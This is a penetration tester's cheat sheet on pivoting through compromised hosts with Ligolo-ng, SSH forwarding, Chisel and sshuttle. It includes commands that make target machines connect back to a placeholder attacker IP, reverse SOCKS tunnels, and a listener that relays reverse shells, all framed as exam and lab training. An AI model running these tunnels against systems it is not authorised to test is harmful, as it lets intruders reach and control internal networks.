Pentest_Notes

🔀 Pivoting, Tunneling & Port Forwarding

Organized notes for pivoting, tunneling, and port forwarding techniques. Last Updated: 2026-03-27

---

Overview

Pivoting allows you to access internal networks through a compromised host. This is critical when targets exist on network segments not directly accessible from the attacker machine.

---

Ligolo-ng

Checklist

• Create TUN interface on attacker
• Start Ligolo proxy on attacker
• Transfer agent to target
• Run agent on target
• Add target network as route
• Select and start session
• Verify tunnels
• Set up reverse shell listeners if needed
• Clean up routes when done

Server Side (Attacker)

# Create TUN interface
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up

# Run the proxy
./proxy -selfcert

Target Side

# Windows
.\agent.exe -connect <ATTACKER_IP>:11601 -ignore-cert

# Linux
./agent -connect <ATTACKER_IP>:11601 -ignore-cert

Route Configuration

# Add target network as route
ip route add 192.168.x.0/24 dev ligolo

Ligolo Commands

# Enter a session
session
# (choose the appropriate session)

# Start tunneling
start

# Confirm active tunnels
tunnel_list

Reverse Shell Listener Through Ligolo

# Create a listener that forwards from agent to attacker
listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444

Cleanup

# Remove routes when done
ip route del 192.168.x.0/24 dev ligolo

⚠️ CPTS Exam Tip: Ligolo-ng is the preferred pivoting tool. Practice the setup thoroughly — you WILL need it in the exam.

---

SSH Tunneling

Local Port Forward

# Forward local port to remote service
ssh -L <LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT> user@<PIVOT_HOST>

# Example: Access internal web server on port 80
ssh -L 8080:10.10.10.5:80 user@pivot.com
# Then browse: http://127.0.0.1:8080

Remote Port Forward

# Forward remote port back to attacker
ssh -R <REMOTE_PORT>:localhost:<LOCAL_PORT> user@<ATTACKER_IP>

# Example: Expose local port 4444 on pivot host
ssh -R 4444:localhost:4444 user@pivot.com

Dynamic SOCKS Proxy

# Create SOCKS proxy
ssh -D 1080 user@<PIVOT_HOST> -N -f

# Use with proxychains
# Edit /etc/proxychains4.conf:
# socks5 127.0.0.1 1080
proxychains nmap -sT -Pn <INTERNAL_IP>

---

Chisel

Chisel is a popular alternative to Ligolo-ng.

Reverse SOCKS Proxy

# On attacker (server)
./chisel server --reverse --port 8000

# On target (client)
./chisel client <ATTACKER_IP>:8000 R:socks

Port Forward

# On attacker
./chisel server --reverse --port 8000

# On target — forward specific port
./chisel client <ATTACKER_IP>:8000 R:8888:<INTERNAL_IP>:80

---

SSHuttle

# Route traffic through SSH
sshuttle -r user@<PIVOT_HOST> <INTERNAL_SUBNET>/24

# With SSH key
sshuttle -r user@<PIVOT_HOST> --ssh-cmd "ssh -i id_rsa" <INTERNAL_SUBNET>/24

---

Common Pitfalls / Gotchas

• Forgetting to add routes after starting Ligolo tunnel
• Not cleaning up routes after engagement
• Using IP addresses instead of FQDNs for Kerberos through tunnels
• Forgetting to configure proxychains for tools that don’t support SOCKS natively
• DNS resolution through tunnels — make sure DNS queries go through the tunnel

References & Further Reading

• Ligolo-ng GitHub
• HackTricks - Tunneling ```